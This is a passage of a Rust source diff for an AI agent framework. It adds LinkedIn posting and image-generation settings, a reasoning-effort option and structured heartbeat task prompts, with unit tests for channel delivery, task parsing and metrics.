/// GitHub repositories to highlight (format: `owner/repo`).
#[serde(default)]
pub github_repos: Vec<String>,
/// Topics of expertise and interest for post themes.
#[serde(default)]
pub topics: Vec<String>,
/// Professional persona description (name, role, expertise).
#[serde(default)]
pub persona: String,
/// Freeform posting instructions for the AI agent.
#[serde(default)]
pub instructions: String,
}
/// Image generation configuration for LinkedIn posts (`[linkedin.image]`).
#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
pub struct LinkedInImageConfig {
/// Enable image generation for posts.
#[serde(default)]
pub enabled: bool,
/// Provider priority order. Tried in sequence; first success wins.
#[serde(default = "default_image_providers")]
pub providers: Vec<String>,
/// Generate a branded SVG text card when all AI providers fail.
#[serde(default = "default_true")]
pub fallback_card: bool,
/// Accent color for the fallback card (CSS hex).
#[serde(default = "default_card_accent_color")]
pub card_accent_color: String,
/// Temp directory for generated images, relative to workspace.
#[serde(default = "default_image_temp_dir")]
pub temp_dir: String,
/// Stability AI provider settings.
#[serde(default)]
pub stability: ImageProviderStabilityConfig,
/// Google Imagen (Vertex AI) provider settings.
#[serde(default)]
pub imagen: ImageProviderImagenConfig,
/// OpenAI DALL-E provider settings.
#[serde(default)]
pub dalle: ImageProviderDalleConfig,
/// Flux (fal.ai) provider settings.
#[serde(default)]
pub flux: ImageProviderFluxConfig,
}
fn default_image_providers() -> Vec<String> {
vec![
"stability".into(),
"imagen".into(),
"dalle".into(),
"flux".into(),
]
}
fn default_card_accent_color() -> String {
"#0A66C2".into()
}
fn default_image_temp_dir() -> String {
"linkedin/images".into()
}
impl Default for LinkedInImageConfig {
fn default() -> Self {
Self {
enabled: false,
providers: default_image_providers(),
fallback_card: true,
card_accent_color: default_card_accent_color(),
temp_dir: default_image_temp_dir(),
stability: ImageProviderStabilityConfig::default(),
imagen: ImageProviderImagenConfig::default(),
dalle: ImageProviderDalleConfig::default(),
flux: ImageProviderFluxConfig::default(),
}
}
}
/// Stability AI image generation settings (`[linkedin.image.stability]`).
#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
pub struct ImageProviderStabilityConfig {
/// Environment variable name holding the API key.
#[serde(default = "default_stability_api_key_env")]
pub api_key_env: String,
/// Stability model identifier.
#[serde(default = "default_stability_model")]
pub model: String,
}
fn default_stability_api_key_env() -> String {
"STABILITY_API_KEY".into()
}
fn default_stability_model() -> String {
"stable-diffusion-xl-1024-v1-0".into()
}
impl Default for ImageProviderStabilityConfig {
fn default() -> Self {
Self {
api_key_env: default_stability_api_key_env(),
model: default_stability_model(),
}
}
}
/// Google Imagen (Vertex AI) settings (`[linkedin.image.imagen]`).
#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
pub struct ImageProviderImagenConfig {
/// Environment variable name holding the API key.
#[serde(default = "default_imagen_api_key_env")]
pub api_key_env: String,
/// Environment variable for the Google Cloud project ID.
#[serde(default = "default_imagen_project_id_env")]
pub project_id_env: String,
/// Vertex AI region.
#[serde(default = "default_imagen_region")]
pub region: String,
}
fn default_imagen_api_key_env() -> String {
"GOOGLE_VERTEX_API_KEY".into()
}
fn default_imagen_project_id_env() -> String {
"GOOGLE_CLOUD_PROJECT".into()
}
fn default_imagen_region() -> String {
"us-central1".into()
}
impl Default for ImageProviderImagenConfig {
fn default() -> Self {
Self {
api_key_env: default_imagen_api_key_env(),
project_id_env: default_imagen_project_id_env(),
region: default_imagen_region(),
}
}
}
/// OpenAI DALL-E settings (`[linkedin.image.dalle]`).
#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
pub struct ImageProviderDalleConfig {
/// Environment variable name holding the OpenAI API key.
#[serde(default = "default_dalle_api_key_env")]
pub api_key_env: String,
/// DALL-E model identifier.
#[serde(default = "default_dalle_model")]
pub model: String,
/// Image dimensions.
#[serde(default = "default_dalle_size")]
pub size: String,
}
fn default_dalle_api_key_env() -> String {
"OPENAI_API_KEY".into()
}
fn default_dalle_model() -> String {
"dall-e-3".into()
}
fn default_dalle_size() -> String {
"1024x1024".into()
}
impl Default for ImageProviderDalleConfig {
fn default() -> Self {
Self {
api_key_env: default_dalle_api_key_env(),
model: default_dalle_model(),
size: default_dalle_size(),
}
}
}
/// Flux (fal.ai) image generation settings (`[linkedin.image.flux]`).
#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)]
pub struct ImageProviderFluxConfig {
/// Environment variable name holding the fal.ai API key.
#[serde(default = "default_flux_api_key_env")]
pub api_key_env: String,
/// Flux model identifier.
#[serde(default = "default_flux_model")]
pub model: String,
}
fn default_flux_api_key_env() -> String {
"FAL_API_KEY".into()
}
fn default_flux_model() -> String {
"fal-ai/flux/schnell".into()
}
impl Default for ImageProviderFluxConfig {
fn default() -> Self {
Self {
api_key_env: default_flux_api_key_env(),
model: default_flux_model(),
}
}
}
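The "tried in sequence; first success wins" contract on `providers` can be sketched with the provider call stubbed out; `first_successful_provider` is a hypothetical name, since the provider dispatch itself is not part of this diff:

```rust
/// Try image providers in configured order; return the first that succeeds.
/// The actual generation call is injected as a closure for illustration.
fn first_successful_provider<F>(providers: &[String], mut try_provider: F) -> Option<String>
where
    F: FnMut(&str) -> Result<Vec<u8>, String>,
{
    for name in providers {
        match try_provider(name) {
            Ok(_image_bytes) => return Some(name.clone()),
            Err(e) => eprintln!("provider {name} failed: {e}"), // fall through
        }
    }
    None // caller may then render the fallback SVG card
}

fn main() {
    let providers: Vec<String> = ["stability", "imagen", "dalle", "flux"]
        .iter()
        .map(|s| s.to_string())
        .collect();
    let winner = first_successful_provider(&providers, |name| {
        if name == "dalle" { Ok(vec![0u8]) } else { Err("unavailable".into()) }
    });
    assert_eq!(winner, Some("dalle".to_string()));
}
```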
// ── Proxy ───────────────────────────────────────────────────────
/// Proxy application scope — determines which outbound traffic uses the proxy.
@@ -3296,6 +3592,9 @@ pub struct RuntimeConfig {
/// - `Some(false)`: disable reasoning/thinking when supported
#[serde(default)]
pub reasoning_enabled: Option<bool>,
/// Optional reasoning effort for providers that expose a level control.
#[serde(default, deserialize_with = "deserialize_reasoning_effort_opt")]
pub reasoning_effort: Option<String>,
}
/// Docker runtime configuration (`[runtime.docker]` section).
@@ -3370,6 +3669,7 @@ impl Default for RuntimeConfig {
kind: default_runtime_kind(),
docker: DockerRuntimeConfig::default(),
reasoning_enabled: None,
reasoning_effort: None,
}
}
}
@@ -3635,6 +3935,13 @@ pub struct HeartbeatConfig {
/// Maximum number of heartbeat run history records to retain. Default: `100`.
#[serde(default = "default_heartbeat_max_run_history")]
pub max_run_history: u32,
/// Optional prompt prefix prepended to heartbeat task prompts.
#[serde(default)]
pub prompt_prefix: Option<String>,
/// Optional allowlist of tool names the heartbeat agent may use.
/// When `None`, all tools are available.
#[serde(default)]
pub allowed_tools: Option<Vec<String>>,
}
fn default_two_phase() -> bool {
@@ -3669,6 +3976,8 @@ impl Default for HeartbeatConfig {
deadman_channel: None,
deadman_to: None,
max_run_history: default_heartbeat_max_run_history(),
prompt_prefix: None,
allowed_tools: None,
}
}
}
@@ -3899,8 +4208,8 @@ pub struct ChannelsConfig {
pub ack_reactions: bool,
/// Whether to send tool-call notification messages (e.g. `🔧 web_search_tool: …`)
/// to channel users. When `false`, tool calls are still logged server-side but
/// not forwarded as individual channel messages. Default: `true`.
#[serde(default = "default_true")]
/// not forwarded as individual channel messages. Default: `false`.
#[serde(default = "default_false")]
pub show_tool_calls: bool,
/// Persist channel conversation history to JSONL files so sessions survive
/// daemon restarts. Files are stored in `{workspace}/sessions/`. Default: `true`.
@@ -4062,7 +4371,7 @@ impl Default for ChannelsConfig {
bluesky: None,
message_timeout_secs: default_channel_message_timeout_secs(),
ack_reactions: true,
show_tool_calls: true,
show_tool_calls: false,
session_persistence: true,
session_backend: default_session_backend(),
session_ttl_hours: 0,
@@ -5584,6 +5893,7 @@ impl Default for Config {
notion: NotionConfig::default(),
node_transport: NodeTransportConfig::default(),
knowledge: KnowledgeConfig::default(),
linkedin: LinkedInConfig::default(),
}
}
}
@@ -7039,6 +7349,16 @@ impl Config {
}
}
if let Ok(raw) = std::env::var("ZEROCLAW_REASONING_EFFORT")
.or_else(|_| std::env::var("REASONING_EFFORT"))
.or_else(|_| std::env::var("ZEROCLAW_CODEX_REASONING_EFFORT"))
{
match normalize_reasoning_effort(&raw) {
Ok(effort) => self.runtime.reasoning_effort = Some(effort),
Err(message) => tracing::warn!("Ignoring reasoning effort env override: {message}"),
}
}
// Web search enabled: ZEROCLAW_WEB_SEARCH_ENABLED or WEB_SEARCH_ENABLED
if let Ok(enabled) = std::env::var("ZEROCLAW_WEB_SEARCH_ENABLED")
.or_else(|_| std::env::var("WEB_SEARCH_ENABLED"))
@@ -7870,6 +8190,7 @@ default_temperature = 0.7
assert!(c.cli);
assert!(c.telegram.is_none());
assert!(c.discord.is_none());
assert!(!c.show_tool_calls);
}
// ── Serde round-trip ─────────────────────────────────────
@@ -8007,6 +8328,7 @@ default_temperature = 0.7
notion: NotionConfig::default(),
node_transport: NodeTransportConfig::default(),
knowledge: KnowledgeConfig::default(),
linkedin: LinkedInConfig::default(),
};
let toml_str = toml::to_string_pretty(&config).unwrap();
@@ -8201,6 +8523,32 @@ reasoning_enabled = false
assert_eq!(parsed.runtime.reasoning_enabled, Some(false));
}
#[tokio::test]
async fn runtime_reasoning_effort_deserializes() {
let raw = r#"
default_temperature = 0.7
[runtime]
reasoning_effort = "HIGH"
"#;
let parsed: Config = toml::from_str(raw).unwrap();
assert_eq!(parsed.runtime.reasoning_effort.as_deref(), Some("high"));
}
#[tokio::test]
async fn runtime_reasoning_effort_rejects_invalid_values() {
let raw = r#"
default_temperature = 0.7
[runtime]
reasoning_effort = "turbo"
"#;
let error = toml::from_str::<Config>(raw).expect_err("invalid value should fail");
assert!(error.to_string().contains("reasoning_effort"));
}
#[tokio::test]
async fn agent_config_defaults() {
let cfg = AgentConfig::default();
@@ -8312,6 +8660,7 @@ tool_dispatcher = "xml"
notion: NotionConfig::default(),
node_transport: NodeTransportConfig::default(),
knowledge: KnowledgeConfig::default(),
linkedin: LinkedInConfig::default(),
};
config.save().await.unwrap();
@@ -10181,6 +10530,31 @@ default_model = "legacy-model"
std::env::remove_var("ZEROCLAW_REASONING_ENABLED");
}
#[tokio::test]
async fn env_override_reasoning_effort() {
let _env_guard = env_override_lock().await;
let mut config = Config::default();
assert_eq!(config.runtime.reasoning_effort, None);
std::env::set_var("ZEROCLAW_REASONING_EFFORT", "HIGH");
config.apply_env_overrides();
assert_eq!(config.runtime.reasoning_effort.as_deref(), Some("high"));
std::env::remove_var("ZEROCLAW_REASONING_EFFORT");
}
#[tokio::test]
async fn env_override_reasoning_effort_legacy_codex_env() {
let _env_guard = env_override_lock().await;
let mut config = Config::default();
std::env::set_var("ZEROCLAW_CODEX_REASONING_EFFORT", "minimal");
config.apply_env_overrides();
assert_eq!(config.runtime.reasoning_effort.as_deref(), Some("minimal"));
std::env::remove_var("ZEROCLAW_CODEX_REASONING_EFFORT");
}
#[tokio::test]
async fn env_override_invalid_port_ignored() {
let _env_guard = env_override_lock().await;
@@ -359,7 +359,8 @@ async fn run_heartbeat_worker(config: Config) -> Result<()> {
let mut tick_had_error = false;
for task in &tasks_to_run {
let task_start = std::time::Instant::now();
let prompt = format!("[Heartbeat Task | {}] {}", task.priority, task.text);
let prompt =
HeartbeatEngine::build_task_prompt(task, config.heartbeat.prompt_prefix.as_deref());
let temp = config.default_temperature;
match Box::pin(crate::agent::run(
config.clone(),
@@ -370,7 +371,7 @@ async fn run_heartbeat_worker(config: Config) -> Result<()> {
vec![],
false,
None,
None,
config.heartbeat.allowed_tools.clone(),
))
.await
{
@@ -390,11 +391,7 @@ async fn run_heartbeat_worker(config: Config) -> Result<()> {
duration_ms,
config.heartbeat.max_run_history,
);
let announcement = if output.trim().is_empty() {
format!("💓 heartbeat task completed: {}", task.text)
} else {
output
};
let announcement = HeartbeatEngine::format_delivery_output(&output, task);
if let Some((channel, target)) = &delivery {
if let Err(e) = crate::cron::scheduler::deliver_announcement(
&config,
@@ -784,6 +781,315 @@ mod tests {
assert!(target.is_none());
}
// ── resolve_heartbeat_delivery edge cases ─────────────────
#[test]
fn resolve_delivery_whitespace_only_target() {
let mut config = Config::default();
config.heartbeat.target = Some(" ".into());
config.heartbeat.to = Some("123".into());
// Whitespace target → treated as None → (None, Some) → error
let err = resolve_heartbeat_delivery(&config).unwrap_err();
assert!(err.to_string().contains("heartbeat.target is required"));
}
#[test]
fn resolve_delivery_whitespace_only_to() {
let mut config = Config::default();
config.heartbeat.target = Some("telegram".into());
config.heartbeat.to = Some(" ".into());
// Whitespace to → treated as None → (Some, None) → error
let err = resolve_heartbeat_delivery(&config).unwrap_err();
assert!(err.to_string().contains("heartbeat.to is required"));
}
#[test]
fn resolve_delivery_both_whitespace() {
let mut config = Config::default();
config.heartbeat.target = Some(" ".into());
config.heartbeat.to = Some(" ".into());
// Both whitespace → (None, None) → auto-detect → None (no channels)
let result = resolve_heartbeat_delivery(&config).unwrap();
assert!(result.is_none());
}
// ── auto_detect_heartbeat_channel edge cases ────────────────
#[test]
fn auto_detect_telegram_empty_allowed_users() {
let mut config = Config::default();
config.channels_config.telegram = Some(crate::config::TelegramConfig {
bot_token: "token".into(),
allowed_users: vec![],
stream_mode: crate::config::StreamMode::default(),
draft_update_interval_ms: 1000,
interrupt_on_new_message: false,
mention_only: false,
});
// No users → target would be empty → returns None
let result = auto_detect_heartbeat_channel(&config);
assert!(result.is_none());
}
#[test]
fn auto_detect_discord_only() {
let mut config = Config::default();
config.channels_config.discord = Some(crate::config::DiscordConfig {
bot_token: "token".into(),
guild_id: None,
allowed_users: vec!["user".into()],
listen_to_bots: false,
mention_only: false,
});
// Discord requires explicit target
let result = auto_detect_heartbeat_channel(&config);
assert!(result.is_none());
}
#[test]
fn auto_detect_telegram_priority_over_discord() {
let mut config = Config::default();
config.channels_config.telegram = Some(crate::config::TelegramConfig {
bot_token: "token".into(),
allowed_users: vec!["tg_user".into()],
stream_mode: crate::config::StreamMode::default(),
draft_update_interval_ms: 1000,
interrupt_on_new_message: false,
mention_only: false,
});
config.channels_config.discord = Some(crate::config::DiscordConfig {
bot_token: "token".into(),
guild_id: None,
allowed_users: vec!["disc_user".into()],
listen_to_bots: false,
mention_only: false,
});
let result = auto_detect_heartbeat_channel(&config);
assert_eq!(
result,
Some(("telegram".to_string(), "tg_user".to_string()))
);
}
// ── validate_heartbeat_channel_config edge cases ────────────
#[test]
fn validate_channel_case_insensitive() {
let mut config = Config::default();
config.channels_config.telegram = Some(crate::config::TelegramConfig {
bot_token: "token".into(),
allowed_users: vec![],
stream_mode: crate::config::StreamMode::default(),
draft_update_interval_ms: 1000,
interrupt_on_new_message: false,
mention_only: false,
});
// "Telegram" with uppercase T should pass
assert!(validate_heartbeat_channel_config(&config, "Telegram").is_ok());
}
#[test]
fn validate_channel_unsupported() {
let config = Config::default();
let err = validate_heartbeat_channel_config(&config, "whatsapp").unwrap_err();
assert!(err.to_string().contains("unsupported"));
}
#[test]
fn validate_channel_not_configured() {
let config = Config::default();
let err = validate_heartbeat_channel_config(&config, "discord").unwrap_err();
assert!(err.to_string().contains("not configured"));
}
#[test]
fn validate_channel_slack_not_configured() {
let config = Config::default();
let err = validate_heartbeat_channel_config(&config, "slack").unwrap_err();
assert!(err.to_string().contains("slack"));
assert!(err.to_string().contains("not configured"));
}
#[test]
fn validate_channel_mattermost_not_configured() {
let config = Config::default();
let err = validate_heartbeat_channel_config(&config, "mattermost").unwrap_err();
assert!(err.to_string().contains("mattermost"));
assert!(err.to_string().contains("not configured"));
}
#[test]
fn validate_channel_empty_string() {
let config = Config::default();
let err = validate_heartbeat_channel_config(&config, "").unwrap_err();
assert!(err.to_string().contains("unsupported"));
}
#[test]
fn validate_channel_telegram_configured_ok() {
let mut config = Config::default();
config.channels_config.telegram = Some(crate::config::TelegramConfig {
bot_token: "token".into(),
allowed_users: vec![],
stream_mode: crate::config::StreamMode::default(),
draft_update_interval_ms: 1000,
interrupt_on_new_message: false,
mention_only: false,
});
assert!(validate_heartbeat_channel_config(&config, "telegram").is_ok());
}
#[test]
fn validate_channel_discord_configured_ok() {
let mut config = Config::default();
config.channels_config.discord = Some(crate::config::DiscordConfig {
bot_token: "token".into(),
guild_id: None,
allowed_users: vec![],
listen_to_bots: false,
mention_only: false,
});
assert!(validate_heartbeat_channel_config(&config, "discord").is_ok());
}
// ── auto_detect_heartbeat_channel additional edge cases ──────
#[test]
fn auto_detect_slack_only() {
let mut config = Config::default();
config.channels_config.slack = Some(crate::config::schema::SlackConfig {
bot_token: "token".into(),
app_token: Some("app".into()),
channel_id: None,
allowed_users: vec!["user".into()],
interrupt_on_new_message: false,
});
// Slack requires explicit target
let result = auto_detect_heartbeat_channel(&config);
assert!(result.is_none());
}
#[test]
fn auto_detect_mattermost_only() {
let mut config = Config::default();
config.channels_config.mattermost = Some(crate::config::schema::MattermostConfig {
url: "https://mm.example.com".into(),
bot_token: "token".into(),
channel_id: None,
allowed_users: vec!["user".into()],
thread_replies: None,
mention_only: None,
});
// Mattermost requires explicit target
let result = auto_detect_heartbeat_channel(&config);
assert!(result.is_none());
}
#[test]
fn auto_detect_telegram_multiple_users_picks_first() {
let mut config = Config::default();
config.channels_config.telegram = Some(crate::config::TelegramConfig {
bot_token: "token".into(),
allowed_users: vec!["first_user".into(), "second_user".into()],
stream_mode: crate::config::StreamMode::default(),
draft_update_interval_ms: 1000,
interrupt_on_new_message: false,
mention_only: false,
});
let result = auto_detect_heartbeat_channel(&config);
assert_eq!(
result,
Some(("telegram".to_string(), "first_user".to_string()))
);
}
// ── resolve_heartbeat_delivery additional edge cases ─────────
#[test]
fn resolve_delivery_empty_string_target() {
let mut config = Config::default();
config.heartbeat.target = Some(String::new());
config.heartbeat.to = Some("123".into());
// Empty string target → trimmed to empty → filtered to None → (None, Some) → error
let err = resolve_heartbeat_delivery(&config).unwrap_err();
assert!(err.to_string().contains("heartbeat.target is required"));
}
#[test]
fn resolve_delivery_empty_string_to() {
let mut config = Config::default();
config.heartbeat.target = Some("telegram".into());
config.heartbeat.to = Some(String::new());
// Empty string to → trimmed to empty → filtered to None → (Some, None) → error
let err = resolve_heartbeat_delivery(&config).unwrap_err();
assert!(err.to_string().contains("heartbeat.to is required"));
}
#[test]
fn resolve_delivery_both_empty_strings() {
let mut config = Config::default();
config.heartbeat.target = Some(String::new());
config.heartbeat.to = Some(String::new());
// Both empty → (None, None) → auto-detect → None
let result = resolve_heartbeat_delivery(&config).unwrap();
assert!(result.is_none());
}
#[test]
fn resolve_delivery_discord_configured() {
let mut config = Config::default();
config.heartbeat.target = Some("discord".into());
config.heartbeat.to = Some("channel-id".into());
config.channels_config.discord = Some(crate::config::DiscordConfig {
bot_token: "token".into(),
guild_id: None,
allowed_users: vec![],
listen_to_bots: false,
mention_only: false,
});
let result = resolve_heartbeat_delivery(&config).unwrap();
assert_eq!(
result,
Some(("discord".to_string(), "channel-id".to_string()))
);
}
#[test]
fn resolve_delivery_slack_configured() {
let mut config = Config::default();
config.heartbeat.target = Some("slack".into());
config.heartbeat.to = Some("C123456".into());
config.channels_config.slack = Some(crate::config::schema::SlackConfig {
bot_token: "token".into(),
app_token: Some("app".into()),
channel_id: None,
allowed_users: vec![],
interrupt_on_new_message: false,
});
let result = resolve_heartbeat_delivery(&config).unwrap();
assert_eq!(result, Some(("slack".to_string(), "C123456".to_string())));
}
#[test]
fn resolve_delivery_mattermost_configured() {
let mut config = Config::default();
config.heartbeat.target = Some("mattermost".into());
config.heartbeat.to = Some("chan-id".into());
config.channels_config.mattermost = Some(crate::config::schema::MattermostConfig {
url: "https://mm.example.com".into(),
bot_token: "token".into(),
channel_id: None,
allowed_users: vec![],
thread_replies: None,
mention_only: None,
});
let result = resolve_heartbeat_delivery(&config).unwrap();
assert_eq!(
result,
Some(("mattermost".to_string(), "chan-id".to_string()))
);
}
/// Verify that SIGHUP does not cause shutdown — the daemon should ignore it
/// and only terminate on SIGINT or SIGTERM.
#[cfg(unix)]
@@ -370,6 +370,7 @@ pub async fn run_gateway(host: &str, port: u16, config: Config) -> Result<()> {
zeroclaw_dir: config.config_path.parent().map(std::path::PathBuf::from),
secrets_encrypt: config.secrets.encrypt,
reasoning_enabled: config.runtime.reasoning_enabled,
reasoning_effort: config.runtime.reasoning_effort.clone(),
provider_timeout_secs: Some(config.provider_timeout_secs),
extra_headers: config.extra_headers.clone(),
api_path: config.api_path.clone(),
@@ -323,6 +323,66 @@ impl HeartbeatEngine {
(priority, status)
}
/// Build a structured, non-conversational prompt for Phase 2 task execution.
pub fn build_task_prompt(task: &HeartbeatTask, prompt_prefix: Option<&str>) -> String {
let mut prompt = String::new();
if let Some(prefix) = prompt_prefix {
prompt.push_str(prefix);
prompt.push_str("\n\n");
}
use std::fmt::Write;
let _ = write!(
prompt,
"You are executing a periodic automated task. You are NOT in a conversation.\n\n\
## Task\n{}\n\n\
## Priority\n{}\n\n\
## Instructions\n\
- Execute this task using available tools (shell, file_read, memory, browser, etc.)\n\
- Report results as a structured brief\n\
- Format:\n\
\x20 **Status:** [completed | partial | failed]\n\
\x20 **Summary:** [1-2 sentences]\n\
\x20 **Details:** [bullet points of findings/actions]\n\
\x20 **Next action:** [follow-up or \"none\"]\n\
- Do NOT greet, ask questions, or use conversational filler\n\
- Be direct and factual\n\n\
## Memory\n\
- Use memory_search to check previous findings for this task\n\
- Use memory_store to save important findings for future ticks",
task.text, task.priority
);
prompt
}
/// Format raw agent output for channel delivery.
///
/// Prepends a header, handles empty output, and truncates for safety.
pub fn format_delivery_output(raw: &str, task: &HeartbeatTask) -> String {
const MAX_DELIVERY_CHARS: usize = 4096;
let header = format!("[{}] {}", task.priority, task.text);
let body = raw.trim();
let body = if body.is_empty() {
"Task completed (no output)"
} else {
body
};
let mut output = format!("{header}\n\n{body}");
if output.len() > MAX_DELIVERY_CHARS {
// Truncate at a char boundary
let mut cutoff = MAX_DELIVERY_CHARS;
while cutoff > 0 && !output.is_char_boundary(cutoff) {
cutoff -= 1;
}
output.truncate(cutoff);
}
output
}
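The backward scan to a char boundary above can be exercised in isolation; a minimal sketch with a hypothetical helper name, assuming a 2-byte UTF-8 character:

```rust
// Minimal sketch of the char-boundary-safe truncation used above
// (hypothetical helper name, not part of the crate).
fn truncate_at_boundary(s: &mut String, max_bytes: usize) {
    if s.len() > max_bytes {
        let mut cutoff = max_bytes;
        // Walk backwards until the cutoff lands on a char boundary, so
        // truncate() never panics mid-codepoint.
        while cutoff > 0 && !s.is_char_boundary(cutoff) {
            cutoff -= 1;
        }
        s.truncate(cutoff);
    }
}

fn main() {
    let mut s = "\u{e9}".repeat(3); // "ééé": 6 bytes, 2 bytes per char
    truncate_at_boundary(&mut s, 5); // byte 5 is mid-char, backs off to 4
    assert_eq!(s, "\u{e9}".repeat(2));
    assert_eq!(s.len(), 4);
}
```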
/// Build the Phase 1 LLM decision prompt for two-phase heartbeat.
pub fn build_decision_prompt(tasks: &[HeartbeatTask]) -> String {
let mut prompt = String::from(
@@ -344,7 +404,8 @@ impl HeartbeatEngine {
"\nRespond with ONLY one of:\n\
- `run: 1,2,3` (comma-separated task numbers to execute)\n\
- `skip` (nothing needs to run right now)\n\n\
Be conservative; skip if tasks are routine and not time-sensitive.",
Be conservative; skip if tasks are routine and not time-sensitive.\n\n\
Do not explain your reasoning. Respond with ONLY the directive.",
);
prompt
@@ -850,4 +911,735 @@ mod tests {
let metrics = engine.metrics();
assert_eq!(metrics.lock().total_ticks, 0);
}
// ── Malformed metadata parsing edge cases ───────────────────
#[test]
fn parse_meta_empty_brackets() {
let tasks = HeartbeatEngine::parse_tasks("- [] Task");
assert_eq!(tasks.len(), 1);
assert_eq!(tasks[0].priority, TaskPriority::Medium);
assert_eq!(tasks[0].status, TaskStatus::Active);
assert_eq!(tasks[0].text, "Task");
}
#[test]
fn parse_meta_pipe_only() {
let tasks = HeartbeatEngine::parse_tasks("- [|] Task");
assert_eq!(tasks.len(), 1);
assert_eq!(tasks[0].priority, TaskPriority::Medium);
assert_eq!(tasks[0].status, TaskStatus::Active);
assert_eq!(tasks[0].text, "Task");
}
#[test]
fn parse_meta_high_pipe_empty() {
let tasks = HeartbeatEngine::parse_tasks("- [high|] Task");
assert_eq!(tasks.len(), 1);
assert_eq!(tasks[0].priority, TaskPriority::High);
assert_eq!(tasks[0].status, TaskStatus::Active);
}
#[test]
fn parse_meta_pipe_paused() {
let tasks = HeartbeatEngine::parse_tasks("- [|paused] Task");
assert_eq!(tasks.len(), 1);
assert_eq!(tasks[0].priority, TaskPriority::Medium);
assert_eq!(tasks[0].status, TaskStatus::Paused);
}
#[test]
fn parse_meta_unknown_tag() {
let tasks = HeartbeatEngine::parse_tasks("- [unknown] Task");
assert_eq!(tasks.len(), 1);
assert_eq!(tasks[0].priority, TaskPriority::Medium);
assert_eq!(tasks[0].status, TaskStatus::Active);
assert_eq!(tasks[0].text, "Task");
}
#[test]
fn parse_meta_case_insensitive() {
let tasks = HeartbeatEngine::parse_tasks("- [HIGH|PAUSED] Task");
assert_eq!(tasks.len(), 1);
assert_eq!(tasks[0].priority, TaskPriority::High);
assert_eq!(tasks[0].status, TaskStatus::Paused);
}
#[test]
fn parse_task_line_unclosed_bracket() {
let tasks = HeartbeatEngine::parse_tasks("- [high Task");
assert_eq!(tasks.len(), 1);
assert_eq!(tasks[0].priority, TaskPriority::Medium);
assert_eq!(tasks[0].status, TaskStatus::Active);
assert_eq!(tasks[0].text, "[high Task");
}
#[test]
fn parse_task_line_nested_brackets() {
let tasks = HeartbeatEngine::parse_tasks("- [high] [extra] Task");
assert_eq!(tasks.len(), 1);
assert_eq!(tasks[0].priority, TaskPriority::High);
assert_eq!(tasks[0].status, TaskStatus::Active);
assert_eq!(tasks[0].text, "[extra] Task");
}
#[test]
fn parse_task_line_metadata_empty_text_after_trim() {
// When text after bracket is empty/whitespace, falls back to plain text
let tasks = HeartbeatEngine::parse_tasks("- [high] ");
assert_eq!(tasks.len(), 1);
assert_eq!(tasks[0].priority, TaskPriority::Medium);
assert_eq!(tasks[0].status, TaskStatus::Active);
assert_eq!(tasks[0].text, "[high]");
}
#[test]
fn parse_meta_multiple_pipes() {
let tasks = HeartbeatEngine::parse_tasks("- [high|active|low] Task");
assert_eq!(tasks.len(), 1);
// Last priority wins: high then low → low
assert_eq!(tasks[0].priority, TaskPriority::Low);
assert_eq!(tasks[0].status, TaskStatus::Active);
}
// ── Decision response parsing edge cases ────────────────────
#[test]
fn parse_decision_empty_response() {
let indices = HeartbeatEngine::parse_decision_response("", 3);
assert!(indices.is_empty());
}
#[test]
fn parse_decision_run_with_extra_spaces() {
let indices = HeartbeatEngine::parse_decision_response("run: 1 , 2 , 3 ", 5);
assert_eq!(indices, vec![0, 1, 2]);
}
#[test]
fn parse_decision_run_space_variant() {
let indices = HeartbeatEngine::parse_decision_response("run 1,2", 5);
assert_eq!(indices, vec![0, 1]);
}
#[test]
fn parse_decision_all_out_of_range() {
let indices = HeartbeatEngine::parse_decision_response("run: 99,100", 3);
assert!(indices.is_empty());
}
#[test]
fn parse_decision_verbose_skip() {
// "I think we should skip" doesn't start with "skip" exactly, so it falls
// through to bare-number parsing, which yields nothing (documents limitation)
let indices = HeartbeatEngine::parse_decision_response("I think we should skip", 3);
assert!(indices.is_empty());
}
#[test]
fn parse_decision_verbose_run_buried() {
// "Based on analysis, run: 1,2" — bare number parse picks up "2" from
// comma-split, so this partially works (documents limitation).
let indices = HeartbeatEngine::parse_decision_response("Based on analysis, run: 1,2", 3);
// Only "2" parses as a valid number from the comma-split fragments
assert_eq!(indices, vec![1]);
}
// ── Metrics edge cases ──────────────────────────────────────
#[test]
fn metrics_ema_zero_duration() {
let mut m = HeartbeatMetrics::default();
m.record_success(0.0);
assert!(!m.avg_tick_duration_ms.is_nan());
assert_eq!(m.avg_tick_duration_ms, 0.0);
}
#[test]
fn metrics_ema_very_large_duration() {
let mut m = HeartbeatMetrics::default();
m.record_success(f64::MAX / 2.0);
assert!(!m.avg_tick_duration_ms.is_infinite());
assert!(!m.avg_tick_duration_ms.is_nan());
}
#[test]
fn metrics_concurrent_access() {
let metrics = Arc::new(ParkingMutex::new(HeartbeatMetrics::default()));
let threads: Vec<_> = (0..4)
.map(|i| {
let m = Arc::clone(&metrics);
std::thread::spawn(move || {
for _ in 0..100 {
let mut lock = m.lock();
if i % 2 == 0 {
lock.record_success(1.0);
} else {
lock.record_failure(1.0);
}
}
})
})
.collect();
for t in threads {
t.join().unwrap();
}
assert_eq!(metrics.lock().total_ticks, 400);
}
#[test]
fn adaptive_interval_large_failure_count() {
// consecutive_failures=20 → saturating_mul shouldn't overflow
let result = compute_adaptive_interval(30, 5, 120, 20, false);
assert!(result <= 120);
assert!(result >= 5);
}
// ── build_task_prompt tests ─────────────────────────────────
#[test]
fn build_task_prompt_contains_task_text() {
let task = HeartbeatTask {
text: "Check email inbox".into(),
priority: TaskPriority::High,
status: TaskStatus::Active,
};
let prompt = HeartbeatEngine::build_task_prompt(&task, None);
assert!(prompt.contains("Check email inbox"));
}
#[test]
fn build_task_prompt_contains_no_greeting_instruction() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Active,
};
let prompt = HeartbeatEngine::build_task_prompt(&task, None);
assert!(prompt.contains("Do NOT greet"));
}
#[test]
fn build_task_prompt_contains_structured_format() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Active,
};
let prompt = HeartbeatEngine::build_task_prompt(&task, None);
assert!(prompt.contains("**Status:**"));
assert!(prompt.contains("**Summary:**"));
assert!(prompt.contains("**Details:**"));
assert!(prompt.contains("**Next action:**"));
}
#[test]
